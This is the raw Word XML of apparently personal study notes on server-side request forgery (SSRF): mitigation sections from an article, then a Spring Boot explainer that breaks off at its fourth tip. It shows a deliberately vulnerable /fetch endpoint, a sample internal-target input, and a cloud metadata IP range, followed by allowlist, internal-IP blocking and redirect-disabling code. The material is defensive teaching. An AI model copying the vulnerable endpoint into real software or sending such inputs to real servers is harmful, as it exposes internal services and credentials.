        <w:t>6.2. The Least Privilege Principle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9E116F" w14:textId="77777777" w:rsidR="001E1307" w:rsidRPr="001E1307" w:rsidRDefault="001E1307" w:rsidP="001E1307">
      <w:r w:rsidRPr="001E1307">
        <w:t>Further, we can ensure that the application’s </w:t>
      </w:r>
      <w:hyperlink r:id="rId27" w:history="1">
        <w:r w:rsidRPr="001E1307">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>permissions and access rights</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="001E1307">
        <w:t> are limited to only what is necessary for its functionality. For example, if application </w:t>
      </w:r>
      <w:r w:rsidRPr="001E1307">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="001E1307">
        <w:t> only needs to read a file to function, we should restrict its permissions to reading.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640FC629" w14:textId="77777777" w:rsidR="001E1307" w:rsidRPr="001E1307" w:rsidRDefault="001E1307" w:rsidP="001E1307">
      <w:r w:rsidRPr="001E1307">
        <w:t>So, we should avoid granting unnecessary access to internal resources or services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C31F008" w14:textId="77777777" w:rsidR="001E1307" w:rsidRPr="001E1307" w:rsidRDefault="001E1307" w:rsidP="001E1307">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E1307">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>6.3. Adequate Firewall Rules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D23448" w14:textId="77777777" w:rsidR="001E1307" w:rsidRPr="001E1307" w:rsidRDefault="001E1307" w:rsidP="001E1307">
      <w:r w:rsidRPr="001E1307">
        <w:t>Poorly set-up </w:t>
      </w:r>
      <w:hyperlink r:id="rId28" w:history="1">
        <w:r w:rsidRPr="001E1307">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>firewall</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="001E1307">
        <w:t> rules can allow attackers to access the network instead of keeping them out. We can solve this challenge by setting firewall rules to block outbound requests to sensitive internal resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452C6BAC" w14:textId="77777777" w:rsidR="001E1307" w:rsidRPr="001E1307" w:rsidRDefault="001E1307" w:rsidP="001E1307">
      <w:r w:rsidRPr="001E1307">
        <w:t>To further </w:t>
      </w:r>
      <w:hyperlink r:id="rId29" w:history="1">
        <w:r w:rsidRPr="001E1307">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>harden the system defense</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="001E1307">
        <w:t>, we can introduce network or web application firewalls (WAFs) to inspect and filter outgoing traffic for SSRF attempts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542B8431" w14:textId="77777777" w:rsidR="001E1307" w:rsidRPr="001E1307" w:rsidRDefault="001E1307" w:rsidP="001E1307">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E1307">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6.4. Apply Network Segmentation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247B3C6C" w14:textId="77777777" w:rsidR="001E1307" w:rsidRPr="001E1307" w:rsidRDefault="001E1307" w:rsidP="001E1307">
      <w:r w:rsidRPr="001E1307">
        <w:t>Similarly, segmenting the network will further bolster our application security against SSRF attacks. </w:t>
      </w:r>
      <w:r w:rsidRPr="001E1307">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>We can do this by partitioning the network into distinct zones with strict controls on communication between them</w:t>
      </w:r>
      <w:r w:rsidRPr="001E1307">
        <w:t>. As a result, attackers will be less likely to access internal systems, even if they exploit SSRF vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C9AEF0" w14:textId="77777777" w:rsidR="001E1307" w:rsidRPr="001E1307" w:rsidRDefault="001E1307" w:rsidP="001E1307">
      <w:r w:rsidRPr="001E1307">
        <w:t>Additionally, we can put sensitive internal resources on network segments that are inaccessible from external-facing systems. This effort alone will drive critical assets farther from the reach of prying eyes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2248ED67" w14:textId="77777777" w:rsidR="001E1307" w:rsidRPr="001E1307" w:rsidRDefault="001E1307" w:rsidP="001E1307">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E1307">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6.5. Implement Request Redirection Mechanism</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C85571" w14:textId="77777777" w:rsidR="001E1307" w:rsidRPr="001E1307" w:rsidRDefault="001E1307" w:rsidP="001E1307">
      <w:r w:rsidRPr="001E1307">
        <w:t>Implementing a redirect mechanism like a proxy for external requests is also a great way to prevent SSRF. A reverse proxy or redirect mechanism intercepts inbound requests and validates them before forwarding them:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A82C5C4" w14:textId="586AB384" w:rsidR="001E1307" w:rsidRPr="001E1307" w:rsidRDefault="001E1307" w:rsidP="001E1307">
      <w:r w:rsidRPr="001E1307">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7022DB5D" wp14:editId="490B7A96">
            <wp:extent cx="5731510" cy="1336675"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1201423354" name="Picture 6" descr="A diagram showing how a reverse proxy server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showing how a reverse proxy server work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336675"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E9B164" w14:textId="77777777" w:rsidR="001E1307" w:rsidRPr="001E1307" w:rsidRDefault="001E1307" w:rsidP="001E1307">
      <w:r w:rsidRPr="001E1307">
        <w:t>This mechanism ensures that only requests that the reverse proxy validates are allowed to reach the intended destination, preventing SSRF attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31472438" w14:textId="77777777" w:rsidR="001E1307" w:rsidRPr="001E1307" w:rsidRDefault="001E1307" w:rsidP="001E1307">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E1307">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6.6. Monitoring and Logging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1145387C" w14:textId="77777777" w:rsidR="001E1307" w:rsidRPr="001E1307" w:rsidRDefault="001E1307" w:rsidP="001E1307">
      <w:r w:rsidRPr="001E1307">
        <w:t>Following the methods previously discussed is essential to mitigating SSRF. However, it’s equally important to monitor and log outbound requests from the application, especially those that could carry out SSRF attempts. We can achieve this by logging every outbound request, including its target URL, request method, headers, and response codes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2794B31B" w14:textId="77777777" w:rsidR="001E1307" w:rsidRPr="001E1307" w:rsidRDefault="001E1307" w:rsidP="001E1307">
      <w:r w:rsidRPr="001E1307">
        <w:t>In addition, we can set up </w:t>
      </w:r>
      <w:hyperlink r:id="rId31" w:history="1">
        <w:r w:rsidRPr="001E1307">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>monitoring systems</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="001E1307">
        <w:t xml:space="preserve"> to identify unusual network behavior in real time, such as a sudden spike in requests to internal IP ranges or unexpected </w:t>
      </w:r>
      <w:r w:rsidRPr="001E1307">
        <w:lastRenderedPageBreak/>
        <w:t>external services. We can do this by setting up threshold alerts that get activated when the number of outbound requests exceeds a certain limit within a specific timeframe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA7E648" w14:textId="77777777" w:rsidR="001E1307" w:rsidRPr="001E1307" w:rsidRDefault="001E1307" w:rsidP="001E1307">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E1307">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6.7. Regular Patches and Updates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3A18F8" w14:textId="77777777" w:rsidR="001E1307" w:rsidRPr="001E1307" w:rsidRDefault="001E1307" w:rsidP="001E1307">
      <w:r w:rsidRPr="001E1307">
        <w:t>Lastly, the recommendation is to always keep all software components, libraries, and frameworks updated with the latest security patches to mitigate known SSRF vulnerabilities. An unpatched vulnerability can be an attacker’s window into our system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01DCC082" w14:textId="77777777" w:rsidR="001E1307" w:rsidRPr="001E1307" w:rsidRDefault="001E1307" w:rsidP="001E1307">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E1307">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7. Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD1E99C" w14:textId="77777777" w:rsidR="001E1307" w:rsidRPr="001E1307" w:rsidRDefault="001E1307" w:rsidP="001E1307">
      <w:r w:rsidRPr="001E1307">
        <w:t>In this article, we discussed server-side request forgery attacks and highlighted the significant consequences and some mitigation techniques to prevent such attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BFBC9DB" w14:textId="77777777" w:rsidR="001E1307" w:rsidRPr="001E1307" w:rsidRDefault="001E1307" w:rsidP="001E1307">
      <w:r w:rsidRPr="001E1307">
        <w:t>In SSRF, attackers manipulate a server to make unauthorized requests. Their goal is often to access sensitive internal resources, which can cause significant damage to the victim.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357BD2A2" w14:textId="77777777" w:rsidR="001E1307" w:rsidRPr="001E1307" w:rsidRDefault="001E1307" w:rsidP="001E1307">
      <w:r w:rsidRPr="001E1307">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Validating user inputs is the most important way to defend against SSRF.</w:t>
      </w:r>
      <w:r w:rsidRPr="001E1307">
        <w:t> Other methods include applying the principle of least privilege, enforcing firewall rules, employing network segmentation, and monitoring and logging requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08DDE398" w14:textId="77777777" w:rsidR="001E1307" w:rsidRDefault="001E1307"/>
    <w:p w14:paraId="77E9AA60" w14:textId="77777777" w:rsidR="001E1307" w:rsidRDefault="001E1307"/>
    <w:p w14:paraId="02431250" w14:textId="77777777" w:rsidR="001E1307" w:rsidRDefault="001E1307"/>
    <w:p w14:paraId="4AA5DE5C" w14:textId="77777777" w:rsidR="000F7A6D" w:rsidRDefault="000F7A6D"/>
    <w:p w14:paraId="59AFFF87" w14:textId="77777777" w:rsidR="000F7A6D" w:rsidRPr="000F7A6D" w:rsidRDefault="000F7A6D" w:rsidP="000F7A6D">
      <w:r w:rsidRPr="000F7A6D">
        <w:t>what is SSRF? How does spring implemented to avoid SSRF?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FEAB8DB"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What is SSRF (Server-Side Request Forgery)?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC28917" w14:textId="77777777" w:rsidR="000F7A6D" w:rsidRPr="000F7A6D" w:rsidRDefault="000F7A6D" w:rsidP="000F7A6D">
      <w:r w:rsidRPr="000F7A6D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SSRF (Server-Side Request Forgery)</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7A6D">
        <w:t xml:space="preserve"> is a vulnerability where an attacker tricks your </w:t>
      </w:r>
      <w:r w:rsidRPr="000F7A6D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>server</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7A6D">
        <w:t xml:space="preserve"> into making a request to another system—often something internal or sensitive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="141227E7" w14:textId="77777777" w:rsidR="000F7A6D" w:rsidRPr="000F7A6D" w:rsidRDefault="000F7A6D" w:rsidP="000F7A6D">
      <w:r w:rsidRPr="000F7A6D">
        <w:pict w14:anchorId="440D5F72">
          <v:rect id="_x0000_i1144" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="179175CE"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Simple Analogy (House </w:t>
      </w:r>
      <w:r w:rsidRPr="000F7A6D">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🏠</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7A6D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42610BBE" w14:textId="77777777" w:rsidR="000F7A6D" w:rsidRPr="000F7A6D" w:rsidRDefault="000F7A6D" w:rsidP="000F7A6D">
      <w:r w:rsidRPr="000F7A6D">
        <w:t xml:space="preserve">Think of your application as a </w:t>
      </w:r>
      <w:r w:rsidRPr="000F7A6D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>security guard</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7A6D">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200C62CC" w14:textId="77777777" w:rsidR="000F7A6D" w:rsidRPr="000F7A6D" w:rsidRDefault="000F7A6D" w:rsidP="000F7A6D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000F7A6D">
        <w:t xml:space="preserve">Normally, users can only access public areas. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1636FFBB" w14:textId="77777777" w:rsidR="000F7A6D" w:rsidRPr="000F7A6D" w:rsidRDefault="000F7A6D" w:rsidP="000F7A6D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000F7A6D">
        <w:t>But with SSRF, an attacker says:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56FD77AF" w14:textId="77777777" w:rsidR="000F7A6D" w:rsidRPr="000F7A6D" w:rsidRDefault="000F7A6D" w:rsidP="000F7A6D">
      <w:r w:rsidRPr="000F7A6D">
        <w:t>“Hey guard, go fetch something from inside your own house (internal network) for me.”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E54ABE" w14:textId="77777777" w:rsidR="000F7A6D" w:rsidRPr="000F7A6D" w:rsidRDefault="000F7A6D" w:rsidP="000F7A6D">
      <w:r w:rsidRPr="000F7A6D">
        <w:t xml:space="preserve">Since the </w:t>
      </w:r>
      <w:r w:rsidRPr="000F7A6D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>server trusts itself</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7A6D">
        <w:t>, it may:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B713083" w14:textId="77777777" w:rsidR="000F7A6D" w:rsidRPr="000F7A6D" w:rsidRDefault="000F7A6D" w:rsidP="000F7A6D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000F7A6D">
        <w:t xml:space="preserve">Access internal APIs (e.g., http://localhost:8080/admin) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405F1B75" w14:textId="77777777" w:rsidR="000F7A6D" w:rsidRPr="000F7A6D" w:rsidRDefault="000F7A6D" w:rsidP="000F7A6D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000F7A6D">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Call cloud metadata services (e.g., AWS credentials) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BAD39BD" w14:textId="77777777" w:rsidR="000F7A6D" w:rsidRPr="000F7A6D" w:rsidRDefault="000F7A6D" w:rsidP="000F7A6D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000F7A6D">
        <w:t xml:space="preserve">Reach internal databases or services not exposed publicly </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8CC028" w14:textId="77777777" w:rsidR="000F7A6D" w:rsidRPr="000F7A6D" w:rsidRDefault="000F7A6D" w:rsidP="000F7A6D">
      <w:r w:rsidRPr="000F7A6D">
        <w:pict w14:anchorId="501383B6">
          <v:rect id="_x0000_i1145" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B496B9"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Example of SSRF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C070907" w14:textId="77777777" w:rsidR="000F7A6D" w:rsidRPr="000F7A6D" w:rsidRDefault="000F7A6D" w:rsidP="000F7A6D">
      <w:r w:rsidRPr="000F7A6D">
        <w:t>@GetMapping("/fetch")</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7A6D">
        <w:br/>
        <w:t>public String fetch(@RequestParam String url) {</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7A6D">
        <w:br/>
        <w:t xml:space="preserve">    return restTemplate.getForObject(url, String.class);</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7A6D">
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F238DE"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Problem:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7C8912" w14:textId="77777777" w:rsidR="000F7A6D" w:rsidRPr="000F7A6D" w:rsidRDefault="000F7A6D" w:rsidP="000F7A6D">
      <w:r w:rsidRPr="000F7A6D">
        <w:t>User provides:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A34B03" w14:textId="77777777" w:rsidR="000F7A6D" w:rsidRPr="000F7A6D" w:rsidRDefault="000F7A6D" w:rsidP="000F7A6D">
      <w:r w:rsidRPr="000F7A6D">
        <w:t>http://localhost:8080/admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8172E8" w14:textId="77777777" w:rsidR="000F7A6D" w:rsidRPr="000F7A6D" w:rsidRDefault="000F7A6D" w:rsidP="000F7A6D">
      <w:r w:rsidRPr="000F7A6D">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>👉</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7A6D">
        <w:t xml:space="preserve"> Server calls </w:t>
      </w:r>
      <w:r w:rsidRPr="000F7A6D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>its own internal endpoint</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7A6D">
        <w:t xml:space="preserve"> → Sensitive data leak</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7321E653" w14:textId="77777777" w:rsidR="000F7A6D" w:rsidRPr="000F7A6D" w:rsidRDefault="000F7A6D" w:rsidP="000F7A6D">
      <w:r w:rsidRPr="000F7A6D">
        <w:pict w14:anchorId="17B0BB28">
          <v:rect id="_x0000_i1146" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="768DF942"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How to Prevent SSRF in Spring Boot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA0439A" w14:textId="77777777" w:rsidR="000F7A6D" w:rsidRPr="000F7A6D" w:rsidRDefault="000F7A6D" w:rsidP="000F7A6D">
      <w:r w:rsidRPr="000F7A6D">
        <w:t xml:space="preserve">Spring doesn’t automatically block SSRF—you must </w:t>
      </w:r>
      <w:r w:rsidRPr="000F7A6D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>design defenses explicitly</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7A6D">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="024E30B5" w14:textId="77777777" w:rsidR="000F7A6D" w:rsidRPr="000F7A6D" w:rsidRDefault="000F7A6D" w:rsidP="000F7A6D">
      <w:r w:rsidRPr="000F7A6D">
        <w:pict w14:anchorId="72089F6E">
          <v:rect id="_x0000_i1147" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CAF475B"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1. Validate &amp; Whitelist URLs (Most Important)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5118FF" w14:textId="77777777" w:rsidR="000F7A6D" w:rsidRPr="000F7A6D" w:rsidRDefault="000F7A6D" w:rsidP="000F7A6D">
      <w:r w:rsidRPr="000F7A6D">
        <w:t>Only allow trusted domains.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3138BC2E" w14:textId="77777777" w:rsidR="000F7A6D" w:rsidRPr="000F7A6D" w:rsidRDefault="000F7A6D" w:rsidP="000F7A6D">
      <w:r w:rsidRPr="000F7A6D">
        <w:t>List&lt;String&gt; allowedHosts = List.of("api.trusted.com");</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7A6D">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="000F7A6D">
        <w:br/>
        <w:t>URI uri = new URI(userInputUrl);</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7A6D">
        <w:br/>
        <w:t>if (!allowedHosts.contains(uri.getHost())) {</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7A6D">
        <w:br/>
        <w:t xml:space="preserve">    throw new IllegalArgumentException("Invalid URL");</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7A6D">
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6897FB30" w14:textId="77777777" w:rsidR="000F7A6D" w:rsidRPr="000F7A6D" w:rsidRDefault="000F7A6D" w:rsidP="000F7A6D">
      <w:r w:rsidRPr="000F7A6D">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>👉</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7A6D">
        <w:t xml:space="preserve"> This is the </w:t>
      </w:r>
      <w:r w:rsidRPr="000F7A6D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>best defense</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298C4F68" w14:textId="77777777" w:rsidR="000F7A6D" w:rsidRPr="000F7A6D" w:rsidRDefault="000F7A6D" w:rsidP="000F7A6D">
      <w:r w:rsidRPr="000F7A6D">
        <w:pict w14:anchorId="4FD93E1D">
          <v:rect id="_x0000_i1148" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CF2300"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2. Block Internal IP Ranges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537E5EC9" w14:textId="77777777" w:rsidR="000F7A6D" w:rsidRPr="000F7A6D" w:rsidRDefault="000F7A6D" w:rsidP="000F7A6D">
      <w:r w:rsidRPr="000F7A6D">
        <w:t>Prevent access to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3207302B" w14:textId="77777777" w:rsidR="000F7A6D" w:rsidRPr="000F7A6D" w:rsidRDefault="000F7A6D" w:rsidP="000F7A6D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000F7A6D">
        <w:t xml:space="preserve">localhost </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58CFB1B8" w14:textId="77777777" w:rsidR="000F7A6D" w:rsidRPr="000F7A6D" w:rsidRDefault="000F7A6D" w:rsidP="000F7A6D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000F7A6D">
        <w:t xml:space="preserve">127.0.0.1 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E1C05A" w14:textId="77777777" w:rsidR="000F7A6D" w:rsidRPr="000F7A6D" w:rsidRDefault="000F7A6D" w:rsidP="000F7A6D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000F7A6D">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">169.254.x.x (cloud metadata) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199D14BD" w14:textId="77777777" w:rsidR="000F7A6D" w:rsidRPr="000F7A6D" w:rsidRDefault="000F7A6D" w:rsidP="000F7A6D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000F7A6D">
        <w:t xml:space="preserve">Private IPs (10.x.x.x, 192.168.x.x) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A315A8C" w14:textId="77777777" w:rsidR="000F7A6D" w:rsidRPr="000F7A6D" w:rsidRDefault="000F7A6D" w:rsidP="000F7A6D">
      <w:r w:rsidRPr="000F7A6D">
        <w:t>InetAddress address = InetAddress.getByName(uri.getHost());</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7A6D">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="000F7A6D">
        <w:br/>
        <w:t>if (address.isAnyLocalAddress() || address.isLoopbackAddress() ||</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7A6D">
        <w:br/>
        <w:t xml:space="preserve">    address.isSiteLocalAddress()) {</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7A6D">
        <w:br/>
        <w:t xml:space="preserve">    throw new SecurityException("Blocked internal address");</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7A6D">
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126B7611" w14:textId="77777777" w:rsidR="000F7A6D" w:rsidRPr="000F7A6D" w:rsidRDefault="000F7A6D" w:rsidP="000F7A6D">
      <w:r w:rsidRPr="000F7A6D">
        <w:pict w14:anchorId="5C30C1D0">
          <v:rect id="_x0000_i1149" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9D2F69"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3. Disable Redirects (Important)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C30A2B1" w14:textId="77777777" w:rsidR="000F7A6D" w:rsidRPr="000F7A6D" w:rsidRDefault="000F7A6D" w:rsidP="000F7A6D">
      <w:r w:rsidRPr="000F7A6D">
        <w:t>Attackers can bypass validation using redirects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40DE2815" w14:textId="77777777" w:rsidR="000F7A6D" w:rsidRPr="000F7A6D" w:rsidRDefault="000F7A6D" w:rsidP="000F7A6D">
      <w:r w:rsidRPr="000F7A6D">
        <w:t>HttpClient client = HttpClient.newBuilder()</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7A6D">
        <w:br/>
        <w:t xml:space="preserve">    .followRedirects(HttpClient.Redirect.NEVER)</w:t>
      </w:r>
      <w:r w:rsidRPr="000F7A6D">
        <w:br/>
        <w:t xml:space="preserve">    .build();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B487EB" w14:textId="77777777" w:rsidR="000F7A6D" w:rsidRPr="000F7A6D" w:rsidRDefault="000F7A6D" w:rsidP="000F7A6D">
      <w:r w:rsidRPr="000F7A6D">
        <w:pict w14:anchorId="55883C40">
          <v:rect id="_x0000_i1150" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="19CF177E"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4. Use Safe HTTP Clients</w:t>
      </w:r>
    </w:p>
